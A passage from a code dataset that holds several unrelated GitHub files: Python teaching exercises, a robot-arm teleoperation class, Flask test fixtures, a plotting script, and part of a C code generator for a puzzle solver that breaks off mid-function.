KukaDrive(object):\n def __init__(self):\n self.move = []\n \n def update_axis_arm(self, command, event_axis=1):\n if event_axis == 1:\n if command > 0:\n self.move = [\"down\"]\n\n elif command <= 0:\n self.move = [\"up\"]\n elif event_axis == 0:\n if command > 1e-3:\n self.move = [\"right\"]\n\n elif command < 1e-3:\n self.move = [\"left\"]\n\n def update_button_arm(self, button):\n\n if button == button_map['up']:\n self.move = [\"up\"]\n \n elif button == button_map['down']:\n self.move = [\"down\"]\n\n elif button == button_map['left']:\n self.move = [\"left\"]\n \n elif button == button_map['right']:\n self.move = [\"right\"]\n \n def reset_command(self):\n self.move = []\n\n def get_commands(self): \n return self.move\n \n\n\n \n","repo_name":"artparkindia/teleoperations","sub_path":"Ros2/teleops/kuka_drive.py","file_name":"kuka_drive.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"23922247817","text":"# Refaça o DESAFIO 051, lendo o primeiro termo e a razão de uma PA,\n# mostrando os 10 primeiros termos usando a estrurura while.\n\nprint('{}{:↔^40}{}\\n'.format('\\033[7m', ' EX 61 ', '\\033[m'))\nprint('{}{:↔^40}{}\\n'.format('\\033[7;1;35m', ' PROGRESSÃO ARITMÉTICA v2.0 ', '\\033[m'))\n\ntermo = int(input('1º termo: '))\nrazao = int(input('Razão: '))\nc = 2\n\nprint('{}'.format('↔'*28))\nwhile c < 11:\n print('{:2}º termo: {:2}'.format(c, termo+razao))\n termo += razao\n c += 1","repo_name":"GabrielRRodrigues/CursoemVideo_Python","sub_path":"Exercícios/ex061.py","file_name":"ex061.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"34652160295","text":"# Дан список:\n# ['в', '5', 'часов', '17', 'минут', 'температура', 'воздуха', 'была', '+5', 'градусов']\n# Необходимо его обработать — обособить каждое целое число (вещественные не трогаем) кавычками (добавить кавычку до и \n# кавычку после элемента списка, являющегося числом) и дополнить нулём до двух целочисленных разрядов:\n\nlist1 = ['в', '5', 'часов', '17', 'минут', 'температура', 'воз��уха', 'была', '+5', 'градусов']\nprint(list1)\n\nlenght: int = len(list1)\nstore_id = id(list1)\nfor i in range(lenght):\n entity = list1.pop(0)\n if entity.isdigit():\n list1.append(F'\"{int(entity):02d}\"')\n elif entity[0] == \"+\" and entity[1].isdigit():\n list1.append(F'\"+{int(entity):02d}\"')\n else:\n list1.append(entity)\nprint(' '.join(list1))","repo_name":"Alex-24x7/Pyton","sub_path":"Lesson 6/DZ6/DZ6_1.py","file_name":"DZ6_1.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"10668324677","text":"\nclass TrainingInstance:\n \"\"\" A single model-training instance. Contains:\n A model\n A set of hyperparameters\n A dataset. \n \"\"\"\n \n def __init__(self, model, data_source, hyperparameters):\n from .utils import Log\n self.model = model\n self.data_source = data_source\n self.hyperparameters = hyperparameters\n self.log = Log(hyperparameters=self.hyperparameters)\n \n\n ","repo_name":"briantimar/batchml","sub_path":"batchml/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"27087086741","text":"import time\nimport holidays\n\ndef isValidTime( unixTimestamp ):\n # returns TRUE if current day a weekday \n # AND if current time is after 8AM HST and before 6PM HST\n # AND if current day isn't a government holiday\n # returns FALSE otherwise\n\n currTime = time.localtime( unixTimestamp )\n \n # check if current day isn't a weekday\n # MONDAY = 0, SATURDAY = 5, SUNDAY = 6\n weekday = currTime.tm_wday\n if weekday >= 5:\n print(\"Today isn't a weekday\")\n return False\n \n # check if current time is before 8AM or after 6PM\n # 8AM when hour = 8 -> time is 8:XX AM\n # 6PM when hour = 18 -> time is 6:XX PM\n hour = currTime.tm_hour\n if hour < 8 or hour >= 18:\n print(\"The current hour isn't during normal work hours!\")\n return False\n\n # check if current day is a holiday\n hawaii_holidays = holidays.country_holidays('US', subdiv='HI')\n if unixTimestamp in hawaii_holidays:\n print(\"Today is a holiday!\")\n return False\n \n return True\n","repo_name":"UHM-SCADA-Lab/SDN","sub_path":"rules/time_rule.py","file_name":"time_rule.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"25157291450","text":"import pytest\nfrom flask import testing\nfrom werkzeug.datastructures import Headers\n\nfrom app import create_app\nfrom app.extensions import db\nfrom config import TestingConfig\nfrom tests.factories import UserFactory\n\nTEST_API_KEY = \"11111111-1111-1111-1111-111111111111\"\n\n\n@pytest.fixture(name=\"application\")\ndef fixture_application():\n \"\"\"Fixture to set up application with configuration.\n\n Yields:\n application -- Application context\n \"\"\"\n app = create_app(TestingConfig)\n flaskapp = app.app\n\n with flaskapp.app_context(), flaskapp.test_request_context():\n db.drop_all()\n db.create_all()\n yield flaskapp\n\n\n@pytest.fixture(name=\"client\")\ndef fixture_client(application):\n \"\"\"Fixture for HTTP test client.\n\n Arguments:\n application -- Application context\n\n Yields:\n client -- HTTP client\n \"\"\"\n with application.test_client() as c:\n yield c\n\n\n@pytest.fixture(name=\"user\")\n@pytest.mark.usefixtures(\"application\")\ndef fixture_user():\n yield UserFactory(email=\"testuser@email.com\", api_key=TEST_API_KEY)\n\n\nclass TestClient(testing.FlaskClient):\n def open(self, *args, **kwargs):\n api_key_headers = Headers({\"X-Api-Key\": self.user.api_key})\n headers = kwargs.pop(\"headers\", Headers())\n headers.extend(api_key_headers)\n kwargs[\"headers\"] = headers\n return super().open(*args, **kwargs)\n\n\n@pytest.fixture(name=\"auth_client\")\ndef fixture_auth_client(application, user):\n \"\"\"Fixture for HTTP test client authenticated.\n\n Arguments:\n application -- Application context fixture\n user -- API user fixture\n\n Yields:\n client -- Authenticated client\n \"\"\"\n TestClient.user = user\n application.test_client_class = TestClient\n with application.test_client() as c:\n yield c\n","repo_name":"taiyeoguns/flask-api-trial","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11123171399","text":"#!/usr/bin/env python\nimport json\nimport matplotlib.pyplot as plt\nfrom numpy import *\n\ndef printout(x, y, label):\n plt.plot(x, y, label=label)\n\n\ndef split(array):\n result = []\n for d in array:\n for i in range(len(d)):\n if len(result) < i + 1:\n result.append([])\n else:\n result[i].append(d[i])\n return result\n\n\nwith open('results', 'r') as f:\n results = json.loads(''.join(f.readlines()))\n\n\nfor s, data in results.items():\n # max_iter = max([i for i, _, _ in data])\n for i in data:\n avrg = mean([j[1] for j in data[i]])\n if avrg:\n printout(i, avrg, '%s-%s' % (s, i))\n # for i in range(1, max_iter + 1):\n # ret = split([[ii, jj, kk] for ii, jj, kk in data if ii == i])\n # if ret:\n #\n # printout(ret[1], ret[2], '%s-%s' % (s, i))\n\n\nplt.legend()\nplt.xlabel('batch size')\nplt.ylabel('elapsed time')\nplt.title(\"test\")\nplt.show()\n\n\n\nimport json\n\nif __name__ == '__main__':\n path = \"/tmp/pyrasite-2038673-objects.json\"\n ans = []\n with open(path, 'r') as f:\n for l in f:\n if l:\n try:\n i = json.loads(l)\n # if i['type'] == 'dict':\n ans.append(i)\n except Exception as e:\n print(i)\n\n ans = sorted(ans, key=lambda x: -x['size'])\n with open(\"ans.json\", 'w') as f:\n for i in ans:\n f.write(\"%s \\n\" % (i))","repo_name":"zhen00fa/script-tools","sub_path":"python/visualize_data.py","file_name":"visualize_data.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"20645733792","text":"class Ders:\n def __init__(self, isim):\n self.isim = isim\n\nclass Ogrenci():\n def __init__(self, isim, soyisim):\n self.isim = isim\n self.soyisim = soyisim\n self.dersler = []\n\n def isim_soyisim(self):\n return self.isim + \" \" + self.soyisim\n\n\nogrenci_isim = input(\"Öğrenci adı giriniz: \")\nogrenci_soyisim = input(\"Öğrenci soyadı giriniz: \")\n\nogrenci = Ogrenci(ogrenci_isim, ogrenci_soyisim)\n\nprint(\"\\n Alabileceğiniz dersler: Matematik, Fizik, Biyoloji, Edebiyat, Kimya\\n\")\n\nders_sayisi = 0\ndersler = []\n\nwhile ders_sayisi < 2:\n ders_isim = input(\"Ders ismi giriniz: \")\n ders = Ders(ders_isim)\n dersler.append(ders_isim)\n ders_sayisi += 1\n\nprint(\"\\n\", ogrenci.isim, ogrenci.soyisim)\n\nprint(dersler)\n\n\n","repo_name":"ilteriskeskin/lyk2017-Python-Example","sub_path":"class/deneme_class5.py","file_name":"deneme_class5.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"tr","doc_type":"code","stars":8,"dataset":"github-code","pt":"95"} +{"seq_id":"11843913780","text":"# Global Libs\nimport os\nimport sys\nimport time\nimport datetime\nimport select\nimport random\nimport multiprocessing\nimport itertools\nimport ctypes\nimport signal\nimport re\nimport json\n\nimport png\nimport math\n\n# Local Libs\nimport defs\nimport puzzle\nimport scenarios\nimport data\nimport external_libs\n\nimport thread_bp_hb\n#import thread_lca\n#import thread_wfn\nimport thread_bp_input\n\n\nclass LibBigPicture( external_libs.External_Libs ):\n\t\"\"\"Defines exploration\"\"\"\n\n\tMACROS_NAMES_A = [ \"utils\", \"generate\", \"main\" ]\n\tMACROS_NAMES_B = [ ]\n\n\tCOMMANDS = {}\n\tCOMMANDS_LIST = [\n\t\t\t\t'CLEAR_SCREEN',\n\t\t\t\t'SHOW_TITLE',\n\t\t\t\t'SHOW_HEARTBEAT',\n\t\t\t\t'SHOW_STATS',\n\t\t\t\t'SHOW_HELP',\n\n\t\t\t\t'LEAVE_CPU_ALONE',\n\t\t\t\t'TIME_TO_FINISH',\n\t\t\t]\n\n\tFLAGS = [\n\t\t\t[ \"Time to finish\",\t\t\"time_to_finish\",\t\t\"TTF\" ],\n\t\t\t[ \"Leave CPU alone\",\t\t\"leave_cpu_alone\",\t\t\"LCA\" ],\n\t\t\t[ \"Pause\",\t\t\t\"pause\",\t\t\t\"Pause\" ],\n\t\t\t[ \"Wait for Notification\",\t\"wait_for_notification\",\t\"WFN\" ],\n\t\t\t[ \"Send a Notification\",\t\"send_a_notification\",\t\t\"SFN\" ],\n\t\t\t[ \"Time Heartbeat\",\t\t\"heartbeat\",\t\t\t\"HB\" ],\n\t\t\t[ \"Max number of heartbeats\",\t\"heartbeat_limit\", \t\t\"HBLimit\" ],\n\t\t\t[ \"Check for Commands\",\t\t\"check_commands\",\t\t\"CheckCommands\" ],\n\t\t\t[ \"Commands for Interactivity\",\t\"commands\",\t\t\t\"Commands\" ],\n\t\t\t[ \"Show help\",\t\t\t\"help\",\t\t\t\t\"Help\" ],\n\t\t\t[ \"Max Depth Seen\",\t\t\"best_depth_seen\",\t\t\"BestDepthSeen\" ],\n\t\t\t[ \"Seed\",\t\t\t\"seed\",\t\t\t\t\"Seed\" ],\n\t\t]\n\n\tSTATS =\t[\n\t\t\t(\"StatsAllocate\", \"stats_allocate\", \"allocation\", \"STATS_ALLOCATE\"),\n\t\t\t(\"StatsCopy\", \"stats_copy\", \"copies\", \"STATS_COPY\"),\n\t\t\t(\"StatsFilterValidPieces\", \"stats_filter_valid_pieces\", \"filter valid_pieces\", \"STATS_FILTER_VALID_PIECES\"),\n\t\t\t(\"StatsFixPieces\", \"stats_fix_pieces\", \"fix piece\", \"STATS_FIX_PIECES\"),\n\n\t\t\t(\"StatsFilterValidPiecesRemoved\", \"stats_filter_valid_pieces_removed\", \"removed\", \"STATS_FILTER_VALID_PIECES_REMOVED\"),\n\t\t\t(\"StatsFilterValidPiecesDeadEnd\", \"stats_filter_valid_pieces_dead_end\", \"dead ends\", \"STATS_FILTER_VALID_PIECES_DEAD_END\"),\n\t\t\t(\"StatsFixPiecesDeadEnd\", \"stats_fix_pieces_dead_end\", \"dead ends\", \"STATS_FIX_PIECES_DEAD_END\"),\n\t\t]\n\n\tARRAYS = STATS + [\n\t\t\t(\"NodesHeartbeat\", \"nodes_heartbeat\", \"heartbeats\", \"NODES_HEARTBEAT\"),\n\t\t]\n\n\tpuzzle = None\n\tvalid_pieces_depth = None\n\n\t# ----- Init the puzzle\n\tdef __init__( self, puzzle, extra_name=\"\", skipcompile=False ):\n\t\t\"\"\"\n\t\tInitialize\n\t\t\"\"\"\n\t\tself.name = \"libbigpicture\"\n\n\t\tself.puzzle = puzzle\n\t\t\n\t\t# Add to the commands the arrays\n\t\tfor (fname, vname, uname, flag) in self.ARRAYS:\n\t\t\tself.COMMANDS_LIST.append( \"SHOW_\"+flag )\n\t\t\tself.COMMANDS_LIST.append( \"ZERO_\"+flag )\n\t\t\tself.COMMANDS_LIST.append( \"ZERO_TOTAL_\"+flag )\n\t\t\tself.COMMANDS_LIST.append( \"SHOW_RESULT_\"+flag )\n\n\n\t\tself.COMMANDS[ \"NONE\" ] = 0\n\t\ti = 0\n\t\tfor c in self.COMMANDS_LIST:\n\t\t\tself.COMMANDS[ c ] = 1< 2:\n\t\t\tprint( \"Commands received: ]\", commands, \"[\" )\n\t\t\tprint( \"global_bigpicture:\", self.global_bigpicture )\n\t\t\tfor (c, n, s) in self.FLAGS:\n\t\t\t\tf = getattr( self.LibExt, \"get\"+s )\n\t\t\t\tprint( \"get\"+s+\" \"+str(f( self.global_bigpicture ))+\" | \"+c )\n\n\t\tcommand_found = False\n\n\t\tfor command in commands:\n\t\t\tif command in [ \"c\", \"cls\", \"clear_screen\" ]:\n\t\t\t\tself.LibExt.xorCommands( self.global_bigpicture, self.COMMANDS[ 'CLEAR_SCREEN' ] )\n\t\t\t\tcommand_found = True\n\t\t\telif command in [ \"\", \"print\", \"cc\", \"check_commands\" ]:\n\t\t\t\tself.LibExt.setCheckCommands( self.global_bigpicture, 1 )\n\t\t\t\tcommand_found = True\n\t\t\telif command in [ \"n\", \"next\" ]:\n\t\t\t\tself.LibExt.setHB( self.global_bigpicture, 10000000 )\n\t\t\t\tcommand_found = True\n\t\t\telif command in [ \"0\", \"000\" ]:\n\t\t\t\tself.LibExt.clearHB( self.global_bigpicture )\n\t\t\t\tcommand_found = True\n\t\t\telif command in [ \"hb\", \"heartbeat\" ]:\n\t\t\t\tlca = self.LibExt.getLCA( self.global_bigpicture )\n\t\t\t\tpause = self.LibExt.getPause( self.global_bigpicture )\n\t\t\t\tif (lca == 0) or (pause == 0):\n\t\t\t\t\tself.LibExt.incHB( self.global_bigpicture )\n\t\t\t\tcommand_found = True\n\t\t\telif command in [ \"s\", \"stats\" ]:\n\t\t\t\tself.LibExt.xorCommands( self.global_bigpicture, self.COMMANDS[ 'SHOW_STATS' ] )\n\t\t\t\tcommand_found = True\n\t\t\telif command in [ \"p\", \"pause\", \"lca\" ]:\n\t\t\t\tself.LibExt.togglePause( self.global_bigpicture, 1 )\n\t\t\t\tcommand_found = True\n\t\t\telif command in [ \"w\", \"sfn\" ]:\n\t\t\t\tself.LibExt.setSFN( self.global_bigpicture, 1 )\n\t\t\t\tcommand_found = True\n\t\t\telif command in [ \"q\", \"quit\", \"exit\" ]:\n\t\t\t\tif self.DEBUG > 0:\n\t\t\t\t\tprint('x-]'+self.XTermInfo+' TTF '+self.XTermNormal+'[-x')\n\t\t\t\tself.LibExt.setTTF( self.global_bigpicture, 1 )\n\t\t\t\tcommand_found = True\n\n\t\t\telif command in [ \"h\", \"help\", \"?\" ]:\n\t\t\t\tself.LibExt.xorCommands( self.global_bigpicture, self.COMMANDS[ 'SHOW_HELP' ] )\n\t\t\t\tcommand_found = True\n\n\t\t\tif not command_found:\n\t\t\t\tfor (fname, vname, uname, flag) in self.ARRAYS:\n\t\t\t\t\tif command in [ \"SHOW_\"+flag, \"ZERO_\"+flag, \"ZERO_TOTAL_\"+flag, \"ZERO_END_\"+flag ]:\n\t\t\t\t\t\tself.LibExt.xorCommands( self.global_bigpicture, self.COMMANDS[ command ] )\n\t\t\t\t\t\tcommand_found = True\n\n\t\tif command_found:\n\t\t\tself.LibExt.setCheckCommands( self.global_bigpicture, 1 )\n\n\n\t# ----- Generate command functions\n\tdef gen_do_commands( self, only_signature=False ):\n\n\t\toutput = []\n\n\t\tfor prefix in [ \"\", \"s\", \"f\" ]:\n\n\t\t\tif prefix == \"\":\n\t\t\t\tout = \"\"\n\t\t\telif prefix == \"s\":\n\t\t\t\tout = \"s_out,\"\n\t\t\telif prefix == \"f\":\n\t\t\t\tout = \"f_out,\"\n\n\t\t\toutput.extend( [ \n\t\t\t\t(0, \"void \"+prefix+\"do_commands(\"),\n\t\t\t\t(1, \"charp s_out,\" if (prefix == \"s\") else \"\" ),\n\t\t\t\t(1, \"FILE * f_out,\" if (prefix == \"f\") else \"\" ),\n\t\t\t\t(1, \"p_bigpicture b\"),\n\t\t\t\t] )\n\n\t\t\tif only_signature:\n\t\t\t\toutput.extend( [ (1, ');'), ])\n\t\t\t\tcontinue\n\t\t\t\n\t\t\toutput.extend( [\n\t\t\t\t(1, \") {\"),\n\t\t\t\t(1, '' ),\n\t\t\t\t(1, 'uint64 i, s;' ),\n\t\t\t\t(1, '' ),\n\n\t\t\t\t# GENERAL COMMANDS\n\t\t\t\t(1, 'if (b->commands & CLEAR_SCREEN)' ),\n\t\t\t\t(2, prefix+'printf( '+out+' \"'+self.XTermClearScr+'\" );' ),\n\t\t\t\t(0, '' ),\n\n\t\t\t\t(1, 'if (b->commands & SHOW_TITLE)' ),\n\t\t\t\t(2, prefix+'printf( '+out+' \"\\\\n' + self.H1_OPEN + self.puzzle.TITLE_STR + self.H1_CLOSE + '\\\\n\\\\n\" );' ),\n\t\t\t\t(0, '' ),\n\n\t\t\t\t(1, 'if (b->commands & SHOW_HEARTBEAT)' ),\n\t\t\t\t(2, prefix+'printf( '+out+' \"Heartbeats: %llu/%llu\\\\n\", b->heartbeat, b->heartbeat_limit);' ),\n\t\t\t\t(0, '' ),\n\n\t\t\t\t(1, 'if (b->commands & SHOW_STATS) {' ),\n\t\t\t\t] )\n\n\t\t\tfor (fname, vname, uname, flag) in self.STATS:\n\t\t\t\toutput.append( (2, prefix+'printf( '+out+' \"'+uname+': %llu\\\\n\", b->'+vname+');' ), )\n\n\t\t\toutput.extend( [\n\t\t\t\t(2, prefix+'printf( '+out+' \"\\\\n\");' ),\n\t\t\t\t(1, '}' ),\n\t\t\t\t] )\n\n\n\n\n\t\t\tfor (fname, vname, uname, flag) in self.STATS:\n\t\t\t\tvtname = vname.replace(\"stats_\", \"stats_total_\")\n\n\t\t\t\toutput.extend( [\n\t\t\t\t(1, 'if (b->commands & SHOW_'+flag+') {' ),\n\t\t\t\t#(2, prefix+'print'+fname+'( '+out+' b );' if self.puzzle.scenario.STATS else \"\"),\n\t\t\t\t#(2, 'printf( \"Total '+vname+' = %llu\\\\n\", b->'+vtname+' );' if self.puzzle.scenario.PERF else \"\"),\n\t\t\t\t(1, '}' ),\n\t\t\t\t(0, '' ),\n\n\t\t\t\t(1, 'if ((b->commands & SHOW_RESULT_'+flag+')&&(b->time_to_finish)) {' ),\n\t\t\t\t#(2, prefix+'print'+fname+'_for_stats_by_depth( '+out+' b );' if self.puzzle.scenario.STATS else \"\"),\n\t\t\t\t#(2, 'printf( \"'+vname+' = %llu (avg = %llu)\\\\n\", b->'+vtname+', b->'+vtname+' / b->heartbeat );' if self.puzzle.scenario.PERF else \"\"),\n\t\t\t\t(1, '}' ),\n\t\t\t\t(0, '' ),\n\n\t\t\t\t#(1, 'if (b->commands & ZERO_'+flag+')' ),\n\t\t\t\t##(2, 'for(i=0;i'+vtname+' += b->'+vname+'[i]; b->'+vname+'[i] = 0; }' ),\n\t\t\t\t#(2, 'for(i=0;i'+vname+'[i] = 0; }' if self.puzzle.scenario.STATS else \"\"),\n\t\t\t\t#(0, '' ),\n\n\t\t\t\t#(1, 'if (b->commands & ZERO_TOTAL_'+flag+')' ),\n\t\t\t\t#(2, 'b->'+vtname+' = 0;' if self.puzzle.scenario.PERF else \"\"),\n\t\t\t\t#(0, '' ),\n\t\t\t\t] )\n\n\n\n\t\t\toutput.extend( [\n\t\t\t\t# HELP\n\t\t\t\t(1, 'if (b->commands & SHOW_HELP) {' ),\n\t\t\t\t(2, prefix+'printf( '+out+' \"\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \"'+self.H1_OPEN+\"List of commands\"+self.H1_CLOSE+'\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \" > 0 | reset heartbeat\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \" > hb | one heartbeat\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \" > c | cls\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \" > w | send notification\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \" > n | next\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \" > p | pause\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \" > n | next\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \" > s | save\\\\n\");'),\n\t\t\t\t(2, prefix+'printf( '+out+' \" > q | quit\\\\n\");'),\n\n\t\t\t\t(2, (prefix+'printf( '+out+' \"\\\\n Stats:\\\\n'+ \"\".join([\n\t\t\t\t\t\" > \"+format(\"SHOW_\"+flag, \"45\")+\n\t\t\t\t\t\" > \"+format(\"ZERO_\"+flag, \"45\")+\n\t\t\t\t\t\" > \"+format(\"ZERO_TOTAL_\"+flag, \"45\")+\"\\\\n\" \n\t\t\t\t\tfor (fname, vname, uname, flag) in self.ARRAYS])+'\\\\n\");') if self.puzzle.scenario.STATS or self.puzzle.scenario.PERF else \"\"),\n\t\t\t\t#(2, 'b->commands &= ~SHOW_HELP;' ),\n\t\t\t\t(1, '}' ),\n\t\t\t\t(0, '' ),\n\t\t\t\t(0, '' ),\n\n\n\t\t\t\t] )\n\n\t\t\toutput.extend( [\n\t\t\t\t(0, '}' ),\n\t\t\t\t(0, '' ),\n\t\t\t\t] )\n\t\n\t\treturn output\n\n\n\n\t# ----- Generate get time to finish\n\tdef gen_getter_setter_function( self, only_signature=False ):\n\n\t\toutput = []\n\t\tfor (c, n, s) in self.FLAGS:\n\n\t\t\toutput.append( (0, \"// \"+c+\" functions\"), )\n\n\t\t\t# ---------------------------------------\n\t\t\toutput.append( (0, \"void clear\"+s+\"(\"), )\n\t\t\toutput.append( (1, \"voidp b\"), )\n\t\t\tif only_signature:\n\t\t\t\toutput.append( (1, ');') )\n\t\t\telse:\n\t\t\t\toutput.append( (1, ') {'), ) \n\t\t\t\toutput.append( (2, 'if (b) ((p_bigpicture)b)->'+n+' = 0;'), ) \n\t\t\t\toutput.append( (2, 'else DEBUG_PRINT((\"NULL on clear'+s+'\\\\n\" ));'), )\n\t\t\t\toutput.append( (1, '}'), ) \n\n\t\t\t# ---------------------------------------\n\t\t\toutput.append( (0, \"uint64 get\"+s+\"(\"), )\n\t\t\toutput.append( (1, \"voidp b\"), )\n\t\t\tif only_signature:\n\t\t\t\toutput.append( (1, ');') )\n\t\t\telse:\n\t\t\t\toutput.append( (1, ') {'), ) \n\t\t\t\toutput.append( (2, 'if (b) return ((p_bigpicture)b)->'+n+';'), ) \n\t\t\t\toutput.append( (2, 'DEBUG_PRINT((\"NULL on get'+s+'\\\\n\" ));'), )\n\t\t\t\toutput.append( (2, 'return 0;'), ) \n\t\t\t\toutput.append( (1, '}'), ) \n\n\t\t\t# ---------------------------------------\n\t\t\toutput.append( (0, \"void set\"+s+\"(\"), )\n\t\t\toutput.append( (1, \"voidp b,\"), )\n\t\t\toutput.append( (1, \"uint64 v\"), )\n\t\t\tif only_signature:\n\t\t\t\toutput.append( (1, ');') )\n\t\t\telse:\n\t\t\t\toutput.append( (1, ') {'), ) \n\t\t\t\toutput.append( (2, 'if (b) ((p_bigpicture)b)->'+n+' = v;'), ) \n\t\t\t\toutput.append( (2, 'else DEBUG_PRINT((\"NULL on set'+s+'\\\\n\" ));'), )\n\t\t\t\toutput.append( (1, '}'), ) \n\n\t\t\t# ---------------------------------------\n\t\t\toutput.append( (0, \"void or\"+s+\"(\"), )\n\t\t\toutput.append( (1, \"voidp b,\"), )\n\t\t\toutput.append( (1, \"uint64 v\"), )\n\t\t\tif only_signature:\n\t\t\t\toutput.append( (1, ');') )\n\t\t\telse:\n\t\t\t\toutput.append( (1, ') {'), ) \n\t\t\t\toutput.append( (2, 'if (b) ((p_bigpicture)b)->'+n+' |= v;'), ) \n\t\t\t\toutput.append( (2, 'else DEBUG_PRINT((\"NULL on or'+s+'\\\\n\" ));'), )\n\t\t\t\toutput.append( (1, '}'), ) \n\t\t\t\n\t\t\t# ---------------------------------------\n\t\t\toutput.append( (0, \"void xor\"+s+\"(\"), )\n\t\t\toutput.append( (1, \"voidp b,\"), )\n\t\t\toutput.append( (1, \"uint64 v\"), )\n\t\t\tif only_signature:\n\t\t\t\toutput.append( (1, ');') )\n\t\t\telse:\n\t\t\t\toutput.append( (1, ') {'), ) \n\t\t\t\toutput.append( (2, 'if (b) ((p_bigpicture)b)->'+n+' ^= v;'), ) \n\t\t\t\toutput.append( (2, 'else DEBUG_PRINT((\"NULL on xor'+s+'\\\\n\" ));'), )\n\t\t\t\toutput.append( (1, '}'), ) \n\t\t\t\n\t\t\t# ---------------------------------------\n\t\t\toutput.append( (0, \"void inc\"+s+\"(\"), )\n\t\t\toutput.append( (1, \"voidp b\"), )\n\t\t\tif only_signature:\n\t\t\t\toutput.append( (1, ');') )\n\t\t\telse:\n\t\t\t\toutput.append( (1, ') {'), ) \n\t\t\t\toutput.append( (2, 'if (b) ((p_bigpicture)b)->'+n+' ++;'), ) \n\t\t\t\toutput.append( (2, 'else DEBUG_PRINT((\"NULL on inc'+s+'\\\\n\" ));'), )\n\t\t\t\toutput.append( (1, '}'), ) \n\t\t\t\n\t\t\t# ---------------------------------------\n\t\t\toutput.append( (0, \"void dec\"+s+\"(\"), )\n\t\t\toutput.append( (1, \"voidp b\"), )\n\t\t\tif only_signature:\n\t\t\t\toutput.append( (1, ');') )\n\t\t\telse:\n\t\t\t\toutput.append( (1, ') {'), ) \n\t\t\t\toutput.append( (2, 'if (b) ((p_bigpicture)b)->'+n+' --;'), ) \n\t\t\t\toutput.append( (2, 'else DEBUG_PRINT((\"NULL on dec'+s+'\\\\n\" ));'), )\n\t\t\t\toutput.append( (1, '}'), ) \n\t\t\t\n\t\t\t# ---------------------------------------\n\t\t\toutput.append( (0, \"void toggle\"+s+\"(\"), )\n\t\t\toutput.append( (1, \"voidp b\"), )\n\t\t\tif only_signature:\n\t\t\t\toutput.append( (1, ');') )\n\t\t\telse:\n\t\t\t\toutput.append( (1, ') {'), ) \n\t\t\t\toutput.append( (2, 'if (b) ((p_bigpicture)b)->'+n+' = ~((p_bigpicture)b)->'+n+';'), ) \n\t\t\t\toutput.append( (2, 'else DEBUG_PRINT((\"NULL on toggle'+s+'\\\\n\" ));'), )\n\t\t\t\toutput.append( (1, '}'), ) \n\t\t\t\n\t\treturn output\n\n\t# ----- Allocate bigpicture memory\n\tdef gen_allocate_bigpicture_function( self, only_signature=False ):\n\n\t\toutput = [ \n\t\t\t(0, \"p_bigpicture allocate_bigpicture(\"),\n\t\t\t]\n\n\t\tif only_signature:\n\t\t\toutput.append( (1, ');') )\n\t\t\treturn output\n\n\t\toutput.append( (1, \") {\") )\n\t\toutput.append( (1, \"p_bigpicture b;\") )\n\t\toutput.append( (1, \"uint64 i;\") )\n\t\toutput.append( (0, \"\") )\n\t\t#output.append( (1, 'DEBUG3_PRINT((\"Allocate Blackwood\\\\n\" ));'), )\n\t\toutput.append( (1, 'b = (p_bigpicture)calloc(1, sizeof(t_bigpicture));') )\n\n\t\tfor (c, n, s) in self.FLAGS:\n\t\t\toutput.append( (1, \"b->\"+n+\" = 0;\") )\n\n\t\toutput.extend( [\n\t\t\t(1, 'return b;'), \n\t\t\t(0, '}' ),\n\t\t\t] )\n\t\t\t\n\t\treturn output\n\n\t# ----- Free bigpicture memory\n\tdef gen_free_bigpicture_function( self, only_signature=False ):\n\n\t\toutput = [ \n\t\t\t(0, \"p_bigpicture free_bigpicture(\"),\n\t\t\t(1, \"p_bigpicture b\"),\n\t\t\t]\n\n\t\tif only_signature:\n\t\t\toutput.append( (1, ');') )\n\t\t\treturn output\n\n\t\toutput.append( (1, \") {\") )\n\t\toutput.append( (1, 'free(b);') )\n\t\toutput.append( (1, 'return NULL;') )\n\t\toutput.append( (0, '}') )\n\t\treturn output\n\n\t# ----- Get Static Valid Pieces\n\tdef gen_get_static_valid_pieces_function( self, only_signature=False ):\n\n\t\toutput = [ \n\t\t\t(0, \"p_piece_full get_static_valid_pieces(\"),\n\t\t\t]\n\n\t\tif only_signature:\n\t\t\toutput.append( (1, ');') )\n\t\t\treturn output\n\n\t\toutput.append( (1, \") {\") )\n\t\toutput.append( (1, 'return static_valid_pieces;') )\n\t\toutput.append( (0, '}') )\n\t\treturn output\n\n\t# ----- Generate print functions\n\tdef gen_PrintValidPieces_functions( self, only_signature=False ):\n\n\t\toutput = []\n\n\t\tuname = \"pieces\"\n\n\t\tW=self.puzzle.board_w\n\t\tH=self.puzzle.board_h\n\t\tWH=self.puzzle.board_wh\n\n\t\tfor prefix in [ \"\", \"s\", \"f\" ]:\n\n\t\t\tif prefix == \"\":\n\t\t\t\tout = \"\"\n\t\t\telif prefix == \"s\":\n\t\t\t\tout = \"s_out,\"\n\t\t\telif prefix == \"f\":\n\t\t\t\tout = 